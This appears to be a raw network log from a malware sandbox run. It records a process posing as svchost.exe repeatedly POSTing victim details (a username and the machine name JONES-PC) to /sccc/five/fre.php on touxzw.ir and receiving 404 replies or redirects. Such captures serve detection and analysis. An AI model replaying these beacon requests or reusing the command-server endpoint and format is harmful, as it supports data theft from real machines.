                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:43:46.997245073 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:43:47.712637901 CET842INHTTP/1.1 404 Not Found
                              Date: Thu, 20 Feb 2025 02:43:47 GMT
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Status: 404 Not Found
                              cf-cache-status: DYNAMIC
                              vary: accept-encoding
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2zPe9FJKjb2wexiRuBckLXj9LRQMRFO%2BLqclEJ9QeBQNBkfT82fNLgfZAlfl5y0ekrBZZtxkr5uF8cIoaFdnOXDdswiEUur1ZLTxQ3ghrcchxdYfYhjjfJpnBBg%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b26ad8d6b41db-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=37189&min_rtt=37189&rtt_var=18594&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              18192.168.2.449755104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:43:48.859348059 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:43:48.866259098 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:43:49.660723925 CET841INHTTP/1.1 404 Not Found
                              Date: Thu, 20 Feb 2025 02:43:49 GMT
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Status: 404 Not Found
                              cf-cache-status: DYNAMIC
                              vary: accept-encoding
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hi2T4UXx6nRCSnxZtc5hGw7jl0U6nE7Zc0lLFLFZMlW0n4SKrebqYDI%2Bt36J2pihCzgwMm%2FsQDI2vL37Yjzy5bmo4J%2FUJEI29dQpVYUq3lVdxMDyGEBVzKjdY5E%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b26b91a374374-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1744&min_rtt=1744&rtt_var=872&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=65&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              19192.168.2.449756104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:43:50.812558889 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:43:50.820013046 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:43:51.567676067 CET818INHTTP/1.1 307 Temporary Redirect
                              Date: Thu, 20 Feb 2025 02:43:51 GMT
                              Connection: close
                              Via: 1.0 middlebox
                              Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php
                              cf-cache-status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OpBc6oECriO%2FuF9lTWacbBQVWW3PAK90Fzpr6BXRBd8I7RsHs7fEEl4H0mWSBUJU7LUE9ykrWJSPvolb7%2BgvJfYtfItPhp1aEP1VVvhNHbDg0NoaiuGCa1Utq64%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b26c52e4c0f3e-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1621&min_rtt=1621&rtt_var=810&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              20192.168.2.449757104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:43:52.716670990 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:43:52.721740961 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:43:53.545025110 CET844INHTTP/1.1 404 Not Found
                              Date: Thu, 20 Feb 2025 02:43:53 GMT
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Status: 404 Not Found
                              cf-cache-status: DYNAMIC
                              vary: accept-encoding
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pcg8bYnRbNNd9lMKBNblxFrAVrqA3Bw%2FNun6kFndLmE3i43FgvMrSAu2C%2FLt1U%2FusgodzWY0FLv4fGOdqUrYyDhB%2FxHx4PjSPvbco05cwvXHbLFCDmfV25uFJ7I%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b26d10aeb4405-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1716&min_rtt=1716&rtt_var=858&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              21192.168.2.449758104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:43:54.687501907 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:43:54.693351030 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:43:55.482131958 CET848INHTTP/1.1 404 Not Found
                              Date: Thu, 20 Feb 2025 02:43:55 GMT
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Status: 404 Not Found
                              cf-cache-status: DYNAMIC
                              vary: accept-encoding
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p29ewD8BqJt2p3tOf%2BNkoAsnJu46QqXfnXHyklFP7kTkA300tlmyBnGhWy5Ly5ggMcxCI1NGuyDXS%2BSjG%2FViJL%2Bm2J3cSEZ2EDN%2FOl%2Fyy06wk3q3fmEEa53O33Y%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b26dd4c980fab-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1931&min_rtt=1931&rtt_var=965&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              22192.168.2.449759104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:43:56.653667927 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:43:56.661304951 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:43:57.403055906 CET825INHTTP/1.1 307 Temporary Redirect
                              Date: Thu, 20 Feb 2025 02:43:57 GMT
                              Connection: close
                              Via: 1.0 middlebox
                              Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php
                              cf-cache-status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mwy0NWrP%2FT8rjPNKSCTXLBzTtKl4raQXQ2%2BuJ0MnjWI6vIB8MUgbINdSc2iWSvG%2F3IRKaP9EERbRWnk0m9bX86e%2BgPc%2BNIRP2W5r7mdOZF78Uo0voVE35yUnhD8%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b26e99f724332-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=2180&min_rtt=2180&rtt_var=1090&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=132&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              23192.168.2.449760104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:43:58.700609922 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:43:58.705694914 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:43:59.467822075 CET840INHTTP/1.1 404 Not Found
                              Date: Thu, 20 Feb 2025 02:43:59 GMT
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Status: 404 Not Found
                              cf-cache-status: DYNAMIC
                              vary: accept-encoding
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vjjCxvx63wI90knRo9AwyDiTdCrfJJhM4JIb07wFk%2FDWc14R37hc9D9u3zAOUbjXecK6aFZNH5XAc1CzGljb3uoB4oIloNpfv7h8zKUurKUOmgg3Ramjz%2Brrrn0%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b26f65e6042e3-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1721&min_rtt=1721&rtt_var=860&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              24192.168.2.449761104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:44:00.625502110 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:44:00.632178068 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:44:01.394223928 CET842INHTTP/1.1 404 Not Found
                              Date: Thu, 20 Feb 2025 02:44:01 GMT
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Status: 404 Not Found
                              cf-cache-status: DYNAMIC
                              vary: accept-encoding
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ucfdw1p0vsdX3MrPgXqONb%2F5X3U91J2pq5vFa5CvgJmg6RvStPsdQgDxFK40tiYHPRwqZ%2BuvcLuXzlCC3InG1%2BrDB3bWXLNCBVWIneju2J65cOOhu4smidzorH4%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b27026f59429d-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1722&min_rtt=1722&rtt_var=861&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              25192.168.2.449762104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:44:02.543962955 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:44:02.549015999 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:44:03.203638077 CET840INHTTP/1.1 404 Not Found
                              Date: Thu, 20 Feb 2025 02:44:03 GMT
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Status: 404 Not Found
                              cf-cache-status: DYNAMIC
                              vary: accept-encoding
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TyixOu8bPJZUMHk6fKK2oks%2BZeolGsIjcDpI2F6JXA5LvSV67VXRWATVkKQFPzJAyMyvgDsKCtubuvSRrCD7bqtqFnzW1Fw0zWGKLOD2QpI2OXUsPk%2FZn3ovI00%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b270e6bc90f49-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1640&rtt_var=820&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              26192.168.2.449763104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:44:04.343209028 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:44:04.348268986 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:44:05.170475960 CET848INHTTP/1.1 404 Not Found
                              Date: Thu, 20 Feb 2025 02:44:05 GMT
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Status: 404 Not Found
                              cf-cache-status: DYNAMIC
                              vary: accept-encoding
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y3i1BaNRkfT1yxgFhWNLYBZ%2FKIHnn0cMZl67%2BC0%2Ftx04yWhq2c60MCYV%2ButgCLyGtHs0COJ82rbeaAZxtt4NKra3UvpXuxF964%2Fo%2FJsuK1gvkGs2stwKwlefjzc%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b2719c92441f2-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1775&min_rtt=1775&rtt_var=887&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              27192.168.2.449764104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:44:06.332422018 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:44:06.337593079 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:44:07.123472929 CET816INHTTP/1.1 307 Temporary Redirect
                              Date: Thu, 20 Feb 2025 02:44:07 GMT
                              Connection: close
                              Via: 1.0 middlebox
                              Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php
                              cf-cache-status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pWZXmka3U9xJ3t09teTDzubFt9L95dq3bdycZWmcy9B2aRVPZmFtF6Cw89tjNKcMlefKCndMDSUEWwqwcuGw3VWaktBIC0bykSP0%2F2l1oPRyGMxrUohU16k0G64%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b272619281889-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1666&min_rtt=1666&rtt_var=833&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              28192.168.2.449766104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:44:08.285682917 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:44:08.290721893 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:44:09.168638945 CET841INHTTP/1.1 404 Not Found
                              Date: Thu, 20 Feb 2025 02:44:09 GMT
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Status: 404 Not Found
                              cf-cache-status: DYNAMIC
                              vary: accept-encoding
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JlnvLbY586dULNONXkGynMrh8TvrO7bG1s61e2QWoKuRFlQuRlGS6FZNmWAWRw9Pan6%2BOPRtP8yRvuOSekGJmXkgEDucU4q%2FZWZ5aHFg1YDDkH97chGhanBuLY8%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b2732b83b8c41-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=5176&min_rtt=5176&rtt_var=2588&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              29192.168.2.449768104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:44:10.311546087 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
                              Feb 20, 2025 03:44:10.316672087 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 30 00 39 00 37 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                              Data Ascii: (ckav.rujones210979JONES-PC0FDD42EE188E931437F4FBE2C
                              Feb 20, 2025 03:44:11.054193974 CET822INHTTP/1.1 307 Temporary Redirect
                              Date: Thu, 20 Feb 2025 02:44:11 GMT
                              Connection: close
                              Via: 1.0 middlebox
                              Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php
                              cf-cache-status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1pZVTifE%2Fx3r6aj7zRnZRCWaTUIi3rvf8XaNcxq1urzmOlSKj%2FXLkFykoxxFmZ4%2FsT2%2FRjiEEbv2O8V5DRwwRJon2yDslJsB8Ix5g4LKzADZaEEjzy2SXKCqbHw%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 914b273eeca65590-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1644&min_rtt=1644&rtt_var=822&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=140&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              30192.168.2.449779104.21.64.1807080C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Feb 20, 2025 03:44:12.211334944 CET238OUTPOST /sccc/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: D509030
                              Content-Length: 149
                              Connection: close
